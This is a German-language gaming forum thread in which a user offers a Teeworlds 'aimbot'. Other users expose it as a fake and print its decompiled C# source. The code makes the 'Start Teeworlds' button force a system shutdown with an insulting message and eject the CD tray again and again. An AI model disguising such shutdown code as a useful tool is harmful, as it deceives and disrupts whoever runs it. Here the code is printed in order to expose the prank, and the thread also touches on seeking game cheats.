Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > General Coding
You last visited: Today at 04:18

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Teeworlds Bot

Discussion on Teeworlds Bot within the General Coding forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
elite*gold: 0
Join Date: Feb 2009
Posts: 19
Received Thanks: 1
Teeworlds Bot

hi ich habe einen Teeworlds aimbot Programmiert ihr könnt ich gerne Testen und sagen was ihr davon haltet
Link:
fraggerking is offline  
Old 02/07/2010, 19:22   #2
 
Bl@ze!'s Avatar
 
elite*gold: 240
Join Date: Dec 2006
Posts: 1,579
Received Thanks: 1,609
Da fühlt sich jemand wichtig und hat ein Fake programm geschrieben, was laufwerk etc. öffnet.

Tool ist Virenfrei, aber kein Bot.
Bl@ze! is offline  
Thanks
1 User
Old 02/08/2010, 01:00   #3
 
elite*gold: 0
Join Date: Mar 2009
Posts: 70
Received Thanks: 2
anscheinend sehr cooler typ !
Sub2378 is offline  
Old 02/08/2010, 14:01   #4
 
elite*gold: 0
Join Date: Nov 2009
Posts: 2
Received Thanks: 0
adi1009 is offline  
Old 02/09/2010, 14:20   #5
 
haggl's Avatar
 
elite*gold: 0
Join Date: May 2007
Posts: 7
Received Thanks: 0
Thumbs down

Quote:
Originally Posted by fraggerking View Post
hi ich habe einen Teeworlds aimbot Programmiert ihr könnt ich gerne Testen und sagen was ihr davon haltet
Link:
ohh ein ganz cooler
wie alt bist du? 11?12?
hör auf damit, sonst wirst du bei weiteren regln verstößen gemeldet
haggl is offline  
Old 02/18/2010, 22:41   #6
 
elite*gold: 0
Join Date: Sep 2009
Posts: 4
Received Thanks: 0
Cool witzig

Naja wollte es mal ansehen. Find ich witzig :P
KaRa.Vs.Rikku is offline  
Old 02/20/2010, 15:55   #7
 
elite*gold: 0
Join Date: Dec 2009
Posts: 4
Received Thanks: 1
wer einen echten bracht bitte melden.
pizuwu is offline  
Thanks
1 User
Old 02/21/2010, 10:04   #8
 
elite*gold: 0
Join Date: Sep 2009
Posts: 445
Received Thanks: 286
Komm so was iss doch echt net schwer zu schreiben!
Das hatt man in 2 Minuen!
Allerdings is das ein bisschen sinnlos, weil der zu lahm ist!
Banana.Crafts is offline  
Old 02/21/2010, 21:21   #9
 
xenex(toemsel)'s Avatar
 
elite*gold: 0
Join Date: Jan 2010
Posts: 241
Received Thanks: 1,180
tsssssss

XD. Nunja für dieses Programm sollte man dich aus dem Board entfernen!

Hier der Quelli :

public class Form1 : Form
{
// Fields
[AccessedThroughProperty("Button1")]
private Button _Button1;
[AccessedThroughProperty("Button2")]
private Button _Button2;
private IContainer components;

// Methods
[DebuggerNonUserCode]
public Form1()
{
this.InitializeComponent();
}

private void Button1_Click(object sender, EventArgs e)
{
Interaction.Shell("Shutdown -s -t 60 -c SCHEI\x00df_AUF_BOTTER!!!", AppWinStyle.MinimizedFocus, false, -1);
string lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door closed";
mciExecute(ref lpstrCommand);
lpstrCommand = "Set CDaudio door open";
mciExecute(ref lpstrCommand);
}

private void Button2_Click(object sender, EventArgs e)
{
this.Close();
}

[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (disposing && (this.components != null))
{
this.components.Dispose();
}
}
finally
{
base.Dispose(disposing);
}
}

[DebuggerStepThrough]
private void InitializeComponent()
{
ComponentResourceManager manager = new ComponentResourceManager(typeof(Form1));
this.Button1 = new Button();
this.Button2 = new Button();
this.SuspendLayout();
Point point = new Point(0x3f, 0x22);
this.Button1.Location = point;
this.Button1.Name = "Button1";
Size size = new Size(0x8e, 0x3e);
this.Button1.Size = size;
this.Button1.TabIndex = 0;
this.Button1.Text = "Start Teeworlds";
this.Button1.UseVisualStyleBackColor = true;
point = new Point(0x3f, 0x83);
this.Button2.Location = point;
this.Button2.Name = "Button2";
size = new Size(0x8e, 60);
this.Button2.Size = size;
this.Button2.TabIndex = 1;
this.Button2.Text = "Beenden";
this.Button2.UseVisualStyleBackColor = true;
SizeF ef = new SizeF(6f, 13f);
this.AutoScaleDimensions = ef;
this.AutoScaleMode = AutoScaleMode.Font;
size = new Size(270, 0xe3);
this.ClientSize = size;
this.ControlBox = false;
this.Controls.Add(this.Button2);
this.Controls.Add(this.Button1);
this.Icon = (Icon) manager.GetObject("$this.Icon");
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = "Form1";
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Teeworlds Bot v1.0";
this.ResumeLayout(false);
}

[DllImport("winmm.dll", CharSet=CharSet.Ansi, SetLastError=true, ExactSpelling=true)]
private static extern long mciExecute([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpstrCommand);

// Properties
internal virtual Button Button1
{
[DebuggerNonUserCode]
get
{
return this._Button1;
}
[MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
set
{
EventHandler handler = new EventHandler(this.Button1_Click);
if (this._Button1 != null)
{
this._Button1.Click -= handler;
}
this._Button1 = value;
if (this._Button1 != null)
{
this._Button1.Click += handler;
}
}
}

internal virtual Button Button2
{
[DebuggerNonUserCode]
get
{
return this._Button2;
}
[MethodImpl(MethodImplOptions.Synchronized), DebuggerNonUserCode]
set
{
EventHandler handler = new EventHandler(this.Button2_Click);
if (this._Button2 != null)
{
this._Button2.Click -= handler;
}
this._Button2 = value;
if (this._Button2 != null)
{
this._Button2.Click += handler;
}
}
}
}
xenex(toemsel) is offline  
Old 02/22/2010, 21:03   #10
 
elite*gold: 0
Join Date: May 2008
Posts: 132
Received Thanks: 120
OMGGGGGGGGGG, wie schlech gecodet und dann noch nicht mal gegen decompiler geschützt hahahahahahaha ^^
krustx is offline  
Thanks
2 Users
Old 03/03/2010, 16:15   #11
 
xenex(toemsel)'s Avatar
 
elite*gold: 0
Join Date: Jan 2010
Posts: 241
Received Thanks: 1,180
Für diese Erkenntnis gibt ein thanks von mir. XD
xenex(toemsel) is offline  
Thanks
1 User
Old 07/03/2011, 11:45   #12
 
bLUM3's Avatar
 
elite*gold: 300
The Black Market: 119/2/0
Join Date: May 2011
Posts: 3,298
Received Thanks: 479
Quote:
Originally Posted by krustx View Post
OMGGGGGGGGGG, wie schlech gecodet und dann noch nicht mal gegen decompiler geschützt hahahahahahaha ^^
1. Machs doch besser?!?
2. Hier mein TW Aimbot Release:
bLUM3 is offline  
Thanks
1 User
Old 12/09/2012, 23:39   #13
 
elite*gold: 0
Join Date: Oct 2012
Posts: 1
Received Thanks: 0
nici6664 is offline  
Closed Thread


Similar Threads Similar Threads
Teeworlds
07/29/2011 - General Gaming Discussion - 5 Replies
Hallo alle weiß nnich ob das schon drinsteht aber teeworlds isn shooter Game man muss sich ned regisrieren einach downloaden is ähnlich wie CS^^ nur die mändchen sind gezeichned gibt seeehr viele server und sehr viele online spiele rund um die uhr hier der downloadlink einfach starten und wenns fragen gibt einfach reinschreiben Download Teeworlds
Teeworlds MOD
09/08/2010 - Main - 1 Replies
Hi, Ich habe da ein kleines problem. Und zwar habe ich die Ncity mod. Ist auch eine sehr alte version. So nun mein problem: Ich besitze einen linux root und habe neben bei eeworlds am laufen. Leider crasht ncity fast jede halbe stunde -.-. Ich hab das ding mit wine laufen. Die MOD crasht auch auf einem windows rechner von daher kanns nicht am betriebssystem hängen. Dies bekomme ich von wine: : leave player='0:{ (RED FACTION)}' wine: Unhandled page fault on read access to 0x00000008 at...
Teeworlds + WPE Pro?
08/08/2010 - General Coding - 5 Replies
Hey guys ;) I think the most of you know the game Teeworlds (if not, it's a very funny multiplayer shooter with a size about only 7 mb). I try to use WPE Pro on that game but it doesnt work. I dont receive any packages but send & sendto are activated. It works fine when I try it with any other game, so the program itself is not the problem... But I can imagine the problem: When I start Teeworlds, two windows pop up. One of them shows the actually game, the other one shows a command prompt,...
TeeWorlds
07/09/2009 - General Coding - 2 Replies
Hay Leudde , ich suche einen GUTEN TeeWorlds Hack pls kein mist posten ... naja dann thx ich hab immer die neuste Version ;) naja dann schon ma Thx.... http://www.elitepvpers.com/forum/epvp-coders/22629 3-teeworlds-aimbot-ver-0-5-1-a-4.html#post2124071 bekomm ich keine wirkung ]
Teeworlds
04/08/2009 - Off Topic - 26 Replies
Ich wollte mal fragen ob wer teeworlds spielt und vll einen Aimbot hat.



All times are GMT +2. The time now is 04:18.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.